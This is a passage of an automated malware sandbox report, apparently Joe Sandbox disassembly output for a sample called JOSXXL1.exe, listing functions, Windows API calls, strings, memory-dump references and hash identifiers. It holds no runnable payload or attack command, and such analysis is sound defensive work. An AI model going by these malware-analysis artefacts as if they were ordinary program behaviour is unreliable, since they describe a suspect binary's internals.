                                                                                                        • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                        • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                        Function 00405D87 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 747 405d87-405d93 748 405d94-405dc8 GetTickCount GetTempFileNameW 747->748 749 405dd7-405dd9 748->749 750 405dca-405dcc 748->750 752 405dd1-405dd4 749->752 750->748 751 405dce 750->751 751->752
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00405DA5
                                                                                                        • GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405DC0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CountFileNameTempTick
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                        • API String ID: 1716503409-678247507
                                                                                                        • Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                        • Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
                                                                                                        • Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                        • Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64
                                                                                                        Function 004064ED Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 753 4064ed-40650d GetSystemDirectoryW 754 406511-406513 753->754 755 40650f 753->755 756 406524-406526 754->756 757 406515-40651e 754->757 755->754 759 406527-406556 wsprintfW LoadLibraryW 756->759 757->756 758 406520-406522 757->758 758->759
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                        • wsprintfW.USER32 ref: 0040653F
                                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                        • String ID: %s%S.dll
                                                                                                        • API String ID: 2200240437-2744773210
                                                                                                        • Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                        • Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
                                                                                                        • Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
                                                                                                        • Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8
                                                                                                        Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405BF0
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                          • Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?,00000000,000000F0), ref: 00401645
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\indvandrings\attraavrdig, xrefs: 00401638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                        • String ID: C:\Users\user\AppData\Local\indvandrings\attraavrdig
                                                                                                        • API String ID: 1892508949-3036879226
                                                                                                        • Opcode ID: 897a2145b85dc8eb1e3e25babfe17602016c627361236b588067241378a32ca2
                                                                                                        • Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
                                                                                                        • Opcode Fuzzy Hash: 897a2145b85dc8eb1e3e25babfe17602016c627361236b588067241378a32ca2
                                                                                                        • Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E
                                                                                                        Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405BF0
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                          • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405C98
                                                                                                        • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0), ref: 00405CA8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                        • String ID: P_B
                                                                                                        • API String ID: 3248276644-906794629
                                                                                                        • Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                        • Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
                                                                                                        • Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                        • Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E
                                                                                                        Function 00406C7C Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                        • Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
                                                                                                        • Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
                                                                                                        • Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44
                                                                                                        Function 00406E7D Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                        • Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
                                                                                                        • Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
                                                                                                        • Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45
                                                                                                        Function 00406B93 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
                                                                                                        • Instruction ID: 37e0958252648d02cff52253bcfdfe32609a82ce416cf41b7e12165f3d842d3a
                                                                                                        • Opcode Fuzzy Hash: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
                                                                                                        • Instruction Fuzzy Hash: 3A814571D04228CFDF24CFA8C944BADBBB1FB44305F25816AD456BB281C7789A96CF45
                                                                                                        Function 00406698 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
                                                                                                        • Instruction ID: badab6c45d1579aebeb642038854a5de2f2e9fe133ee6b5741b25705484aa732
                                                                                                        • Opcode Fuzzy Hash: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
                                                                                                        • Instruction Fuzzy Hash: 9A816731D04228DBDF24CFA8C844BADBBB0FF44305F21856AD856BB281D7796A86DF45
                                                                                                        Function 00406AE6 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
                                                                                                        • Instruction ID: 661ade8e8f79e5a6005bf83598ee02ccf2e60dcd73e05bd09c6951c965a298a8
                                                                                                        • Opcode Fuzzy Hash: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
                                                                                                        • Instruction Fuzzy Hash: DC713471D00228CFDF24CFA8C944BADBBB1FB48305F25816AD846B7281D7799A96DF44
                                                                                                        Function 00406C04 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                        • Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
                                                                                                        • Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
                                                                                                        • Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45
                                                                                                        Function 00406B50 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
